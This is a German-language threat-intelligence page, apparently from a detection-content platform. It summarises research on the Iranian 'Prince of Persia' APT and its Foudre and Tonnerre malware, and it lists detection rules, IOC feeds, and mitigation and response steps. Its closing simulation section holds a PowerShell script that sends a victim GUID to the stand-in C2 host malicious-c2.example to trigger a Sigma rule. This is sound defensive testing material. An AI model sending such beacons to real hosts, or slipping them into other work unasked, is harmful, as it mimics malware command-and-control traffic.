Prince of Persia: Ein 10-Jahres-Rückblick auf die iranischen APT-Aktivitäten
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht beschreibt das dem iranischen Staat zugeschriebene APT-Cluster namens Prince of Persia und verfolgt seine Entwicklung im letzten Jahrzehnt, wobei der Schwerpunkt auf der von 2023 bis 2025 beobachteten Aktivität liegt. Die Betreiber verlassen sich auf maßgeschneiderte Malwarefamilien – darunter Foudre, Tonnerre, MaxPinner, Rugissement und Deep Freeze –, um Spionage und systematischen Datendiebstahl zu unterstützen. Neuere Versionen führen Domänengenerierungsalgorithmen, Telegram-basierte Command-and-Control-Techniken und verschlüsselte SFX-Payloads ein, um die Widerstandsfähigkeit und Verschleierung zu verbessern. Die Zielobjekte umfassen kritische Infrastrukturen und Netzwerke mit dissidenten Beziehungen in mehreren Regionen.
Untersuchung
SafeBreach-Forscher verfolgten die Operationen der Gruppe ab 2019, sammelten neue Proben, dokumentierten C2-Architekturen und analysierten die DGA-Logik. Sie entschlüsselten geschützte Payloads, extrahierten Telegram-Bot-Anmeldeinformationen und erstellten einen Zeitplan der Varianten-Implementierungen. Die Forschung hebt separate Produktions- und Testinfrastrukturen hervor und beschreibt Dateidrop-Verhaltensweisen, die mit Excel-gesteuerten Infektionsketten verbunden sind. Indikatoren eines Kompromisses wurden aus Malware-Hashes, Domains und URLs zusammengetragen.
Abschwächung
Überwachen Sie die DNS-Aktivität auf die identifizierten DGA-Muster, blockieren Sie bekannte bösartige Domains und beschränken oder inspizieren Sie den mit Telegram-Bots verbundenen Datenverkehr. Fügen Sie Erkennungsmaßnahmen für die referenzierten Malware-Dateinamen und Loader-DLL-Artefakte hinzu und verwenden Sie die DNS-Überwachung/Sinkholing, um rotierende Infrastrukturen zu identifizieren. Erzwingen Sie die Zulassung von Anwendungen und erhöhen Sie die Sicherheit in Office, indem Sie Makros einschränken, um die Wahrscheinlichkeit eines Erstzugangs zu verringern.
Reaktion
Wenn ein Indikator gefunden wird, isolieren Sie das betroffene System, erfassen Sie flüchtige Beweise und führen Sie gezielte Forensik auf abgelegten Dateien und relevanten Registrierungspunkten durch. Blockieren Sie alle verlinkten Domains und IP-Adressen, rotieren Sie exponierte Telegram-Bot-Tokens und setzen Sie Anmeldeinformationen für betroffene Konten zurück. Suchen Sie umfassend nach den benutzerdefinierten Loader-DLL-Überresten und verschlüsselten SFX-Payloads, um vollständige Auslöschung sicherzustellen.
Angriffsablauf
Erkennungen
Möglicher Missbrauch von Telegram als Command-and-Control-Kanal (über dns_query)
Ansicht
Mögliche Dateninfiltration / -exfiltration / C2 über Drittanbieterdienste / -tools (über Proxy)
Ansicht
Verdächtige Command-and-Control-Anfrage durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (über dns)
Ansicht
Verdächtige Taskkill-Ausführung (über cmdline)
Ansicht
IOCs (HashSha256) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe Teil 2
Ansicht
IOCs (SourceIP) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe
Ansicht
IOCs (HashSha256) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe Teil 1
Ansicht
IOCs (HashMd5) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe
Ansicht
IOCs (DestinationIP) zur Erkennung: 18. DEZ. 2025 Prince of Persia: Ein Jahrzehnt iranischer staatlicher APT-Kampagnen unter der Lupe
Ansicht
Erkennung von Foudre v34-Infektion über Excel-Datei mit eingebettetem ausführbaren Programm [Windows-Prozess-Erstellung]
Ansicht
Erkennung von Foudre- und Tonnerre-C2-Kommunikation [Windows-Netzwerkverbindung]
Ansicht
Simulation
Voraussetzung: Der Telemetrie- und Basisdaten-Pre‑Flight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Gegnertechnik (T1584.005), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genau von der Erkennungslogik erwartete Telemetrie zu erzeugen.
-
Angriffsnarrativ und Befehle:
Der Bedrohungsakteur hat eine bösartige Domain eingerichtetmalicious-c2.exampledie den Foudre/Tonnerre-C2-Server hostet. Die Payload des Angreifers auf dem Opfercomputer führt zwei HTTP-GET-Anfragen aus:- Sendet die GUID des Opfers an den Foudre-C2-Endpunkt unter Verwendung des Pfads
/1/?c=<GUID>. - Kontaktiert die Telegram-API über die Tonnerre-Hintertür mit dem Pfad
/t/tga.adr.
Beide Anfragen werden über HTTP gesendet (um die Proxy-Protokollierung zu erleichtern) und beinhalten eine generische User-Agent, um sich in den normalen Datenverkehr zu mischen. Die Aktionen erzeugen die genauen Felder (
request_method=GET,urldie die Sigma-Regel überwacht. - Sendet die GUID des Opfers an den Foudre-C2-Endpunkt unter Verwendung des Pfads
-
Regressionstest-Skript:
# ------------------------------------------------------------ # Foudre & Tonnerre C2-Kommunikationssimulation (Windows) # ------------------------------------------------------------ # 1. Definieren Sie die GUID des Opfers (bei einer echten Infektion würde dies aus der Registrierung gelesen werden) $guid = (New-Guid).Guid # 2. Definieren Sie den bösartigen C2-Host (ersetzen Sie ihn durch eine von Ihnen kontrollierte Adresse zum Testen) $c2Host = "http://malicious-c2.example" # 3. Senden Sie die GUID an den Foudre-C2-Endpunkt $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] Senden der GUID an Foudre C2: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Kontaktieren Sie die Telegram-API über die Tonnerre-Hintertür $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Kontaktieren des Telegram-API-Endpunkts: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme."Das Skript ist eigenständig; wenn es auf einem Windows-Host ausgeführt wird, der den Datenverkehr über den konfigurierten Proxy leitet, werden zwei Protokolleinträge erzeugt, die den Bedingungen der Sigma-Regel entsprechen
url|containsBedingungen. -
Bereinigungskommandos:
# Entfernen Sie alle temporären Netzwerkverbindungen (nur relevant, wenn der Proxy dauerhafte Sitzungen erstellt) # Hier löschen wir einfach den DNS-Cache, um eine fortwährende Auflösung des bösartigen Hosts zu vermeiden. ipconfig /flushdns Write-Host "[*] Bereinigung abgeschlossen."